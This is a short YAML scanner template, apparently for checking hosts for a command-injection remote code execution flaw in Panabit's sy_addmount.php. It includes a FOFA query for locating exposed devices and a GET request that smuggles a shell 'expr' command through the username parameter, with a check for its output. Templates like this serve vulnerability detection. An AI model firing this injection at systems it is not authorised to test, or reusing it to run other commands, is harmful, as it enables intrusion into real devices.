id: panabit-syaddmount-command-exec

info:
  name: Panabit Syaddmount RCE
  author: xpoc,NoHack
  severity: critical
  verified: true
  description: |
    FOFA: "panabit" && server=="nginx"
  reference:
    - https://blog.csdn.net/weixin_51387754/article/details/121147617
  tags: panabit,rce
  created: 2023/06/22

set:
  r1: randomInt(800000000, 1000000000)
  r2: randomInt(800000000, 1000000000)
rules:
  r0:
    request:
      method: GET
      path: /account/sy_addmount.php?username=|expr%20{{r1}}%20%2B%20{{r2}}
    expression: response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()